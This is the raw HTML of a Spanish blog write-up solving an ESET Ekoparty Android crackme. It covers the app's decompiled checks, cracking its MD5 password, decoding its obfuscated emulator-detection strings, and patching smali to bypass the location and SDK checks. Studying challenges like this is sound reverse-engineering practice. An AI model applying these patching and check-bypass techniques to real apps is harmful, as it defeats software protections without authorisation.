<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Marshmallow" style="background: none; color: #0b0080; text-decoration: none;" title="Android Marshmallow" wotsearchprocessed="true">Marshmallow</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">6.0–6.0.1</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/5_de_octubre" style="background: none; color: #0b0080; text-decoration: none;" title="5 de octubre" wotsearchprocessed="true">5 de octubre</a> de <a href="https://es.wikipedia.org/wiki/2015" style="background: none; color: #0b0080; text-decoration: none;" title="2015" wotsearchprocessed="true">2015</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">23</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/Android_Nougat" style="background: none; color: #0b0080; text-decoration: none;" title="Android Nougat" wotsearchprocessed="true">Nougat</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">7.0 - 7.1</td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;"><a href="https://es.wikipedia.org/wiki/15_de_junio" style="background: none; color: #0b0080; text-decoration: none;" title="15 de junio" wotsearchprocessed="true">22 de agosto</a> de <a href="https://es.wikipedia.org/wiki/2016" style="background: none; color: #0b0080; text-decoration: none;" title="2016" wotsearchprocessed="true">2016</a></td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em 0.4em;">24 - 25</td></tr>
</tbody></table>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class Login</b> en la cual se hacen varias comprobaciones para presentar el frame de login y pasar a la segunda etapa del desafío que es la de desencriptar un recurso y ejecutarlo (otro apk).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Función<b> chkn </b>(boolean) retorna verdadero si la latitud es 40 y la longitud es -74 en la geolocalización del dispositivo.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">public boolean chkn()</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> int j = 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> int i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (this.l != null)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((int)this.l.getLatitude() == 40)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((int)this.l.getLongitude() == -73)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = 1;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return i;</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Acá tenemos una comprobación importante, se debe cumplir las dos, la chkn (lat:40 y long:-73) y la chks (version del SDK) de la class <b>f </b>para mostrar el frame del login, por otro lado se imprime un hint en el logcat</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">if ((<b>chkn()</b>) && (<b>f.chks()</b>))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> setContentView(2130968602);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.bt = ((Button)findViewById(2131492970));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.tx = ((EditText)findViewById(2131492969));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.vw = ((TextView)findViewById(2131492971));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.vw.setOnClickListener(new c());</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Toast.makeText(this.con, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.", 1).show();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Log.i(d.z, "<b>HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Tenemos un hash md5 que corresponde a una clave a ingresar.</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> public void onClick(View paramView)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (((paramView instanceof Button)) && (paramView == this.bt))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramView = this.tx.getText().toString();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> MessageDigest localMessageDigest = MessageDigest.getInstance("MD5");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> localMessageDigest.update(paramView.getBytes("UTF-8"));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramView = String.format("%032x", new Object[] { new BigInteger(1, localMessageDigest.digest()) });</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (!paramView.equalsIgnoreCase("<b>16cc45d14201e8caf26d48e636b1c48d</b>"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Buscamos en internet el MD5 y corresponde a <b>3gg535</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Desencripción del recurso "enc" localizado en assets/ mediante la class b </b></span><b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"> función b.decrypt(</span></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;">);</span></span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJsDhn5GojMPTS5Hw2E9EREBq-XYZfEMx31VYuCvCS_8r3qvBvUMXUYpg-1rQnus1dLWIHMQwicIRWvr_PrhmyvQhqiPDtgFIGNK4k7WRWPIlRQzmGibzi2SJQeHxJ-8LK-SZRMd3zg4/s1600/enc-recurso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJsDhn5GojMPTS5Hw2E9EREBq-XYZfEMx31VYuCvCS_8r3qvBvUMXUYpg-1rQnus1dLWIHMQwicIRWvr_PrhmyvQhqiPDtgFIGNK4k7WRWPIlRQzmGibzi2SJQeHxJ-8LK-SZRMd3zg4/s640/enc-recurso.jpg" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000;"><br /></span></span></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">protected String doInBackground(String[] paramArrayOfString)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> File localFile = new File(Environment.getExternalStorageDirectory().getPath() + "<b>/content.apk</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((localFile.exists()) && (localFile.length() > 0L))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return "Error";</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><span style="font-size: x-small;"> InputStream localInputStream = </span><b><span style="font-size: x-small;">Login.this.getApplicationContext().</span>getResources().getAssets().open("enc");</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> FileOutputStream localFileOutputStream = new FileOutputStream(localFile);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><span style="font-size: x-small;"> </span><b><span style="color: #cc0000;"><span style="font-size: large;"> b.decrypt</span>(</span>paramArrayOfString[0], localInputStream, localFileOutputStream);</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramArrayOfString = new Intent("android.intent.action.VIEW");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> <b> paramArrayOfString.setDataAndType(Uri.fromFile(localFile), "application/vnd.android.package-archive</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Login.this.startActivity(paramArrayOfString);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.blnResult = true;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return "Executed";</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> catch (Exception paramArrayOfString)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> while (true)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramArrayOfString.printStackTrace();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Log.e(d.z, paramArrayOfString.getMessage());</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>-----------------------------------------------------------------------------------------------------</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class d</b> donde se llama a la class<b> e </b>y se desencriptan varios strings que serán utilizados en la class<b> f </b>para comprobar en que tipo de dispositivo especifico se esta ejecutando y desviar un poco la atención del reverser.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">package eset.ekoparty.challenge.crackmebabe;</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">public class <b>d</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">{</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static String a = "12321322869";</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String b = e.pqz("htDaDYyZOg==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String c = e.pqz("tNrV");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String g = e.pqz("5Y6OT9PAbvGYtDsxJChCQI0=");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String h = e.pqz("5dnREIScO57b4GAj");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String i = e.pqz("5fvTCo+RKq7apg==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String k = e.pqz("5dnbEYaCN6KK");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String l = e.pqz("5cvQFI2fKa+K");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String m = e.pqz("5f/QG5GfN6WI109KNHoHGcNbxcOzZ57tl8xC");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String n = e.pqz("5fnbEZqdMbXB62Uj");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String y = e.pqz("r8rKD9nfca3F439nbTYRH8IA2tThctH5w48NXoLVdHkq1Yo=");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"> public static final String z = e.pqz("hMzfHIjQE6SIxmpjcQ==");</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;">}</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Decodificadas quedan</b></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
a = 12321322869</div>
<div class="separator" style="clear: both;">
b = Android</div>
<div class="separator" style="clear: both;">
c = sdk</div>
<div class="separator" style="clear: both;">
g = 000000000000000</div>
<div class="separator" style="clear: both;">
h = google_sdk</div>
<div class="separator" style="clear: both;">
i = Emulator</div>
<div class="separator" style="clear: both;">
k = generic</div>
<div class="separator" style="clear: both;">
l = unknown</div>
<div class="separator" style="clear: both;">
m = Android SDK built for x86</div>
<div class="separator" style="clear: both;">
n = Genymotion</div>
<div class="separator" style="clear: both;">
y = http://lmgtfy.com/?q=gollum+riddles</div>
<div class="separator" style="clear: both;">
z = Crack Me Babe</div>
<div>
<br /></div>
<div class="separator" style="clear: both;">
<b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class e </b>se encarga de pasar a texto las cadenas base64 encontradas en la classe d</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">public class e</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">{</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> static String pqz(String paramString)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramString = new String(new a(d.a.getBytes("UTF-8")).a(Base64.decode(paramString.getBytes(), 0)), "UTF-8");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> String str = paramString.replace("\"", "");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Bueno como salimos de este lio....</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">La clave la tenemos que es </span><b style="font-family: Arial, Helvetica, sans-serif;">3gg535 </b><span style="font-family: "arial" , "helvetica" , sans-serif;">quiere decir que lo mas difícil son las comprobaciones de las funciones de las class </span><b style="font-family: Arial, Helvetica, sans-serif;">Login </b><span style="font-family: "arial" , "helvetica" , sans-serif;">y </span><b style="font-family: Arial, Helvetica, sans-serif;">F</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Entonces vamos a modificar el código SMALI para que nos permita pasar a la pantalla de ingreso de password y lograr desencriptar el recurso enc.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Luego de modificar los <b>.SMALI</b> re-compilamos con el APK-</span><span style="font-family: "arial" , "helvetica" , sans-serif;">Multi-tool</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> y firmamos con el signapk.jar </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Modificando Login.SMALI</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Código java:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Cambiamos el if <b>((chkn()) && b(f.chks()))</b> por </span><span style="font-family: "arial" , "helvetica" , sans-serif;">if <b>((</b></span><b><span style="font-family: "arial" , "helvetica" , sans-serif;">f.chks()</span><span style="font-family: "arial" , "helvetica" , sans-serif;">) && (</span><span style="font-family: "arial" , "helvetica" , sans-serif;">f.chks()</span><span style="font-family: "arial" , "helvetica" , sans-serif;">)) </span></b><br />
<br />
<br />
<span style="color: #cc0000;"><span style="font-family: "arial" , "helvetica" , sans-serif;">if ((</span><b style="font-family: arial, helvetica, sans-serif;">f.chks()</b><span style="font-family: "arial" , "helvetica" , sans-serif;">) && (</span><b style="font-family: arial, helvetica, sans-serif;">f.chks()</b><span style="font-family: "arial" , "helvetica" , sans-serif;">)) </span></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> setContentView(2130968602);</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.bt = ((Button)findViewById(2131492970));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.tx = ((EditText)findViewById(2131492969));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.vw = ((TextView)findViewById(2131492971));</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> this.vw.setOnClickListener(new c());</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> Toast.makeText(this.con, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.", 1).show();</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> Log.i(d.z, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.");</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> return;</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #cc0000; font-size: xx-small;"></span></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><b><br /></b></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: xx-small;">En .SMALI sería:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> .line 63</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> :cond_1</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> invoke-static {}, Leset/ekoparty/challenge/crackmebabe/f;->chks()Z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> move-result v0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if-eqz v0, :cond_2</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> invoke-static {}, Leset/ekoparty/challenge/crackmebabe/f;->chks()Z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> move-result v0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if-eqz v0, :cond_2</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Modificando f.SMALI</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Código java:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Modificamos chks() para que retorne verdadero si utilizamos una versión menor a 99, con esto podemos probarlo en cualquier API level.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> public static boolean chks()</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> return Build.VERSION.SDK_INT < 99;</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="color: #cc0000; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">En .SMALI sería:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> sget v0, Landroid/os/Build$VERSION;->SDK_INT:I</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> const/16 v1, 0x63 </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> </span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: x-small;"> if-ge v0, v1, :cond_0</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Compilamos con opción 12 de APK-Multi-tool</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
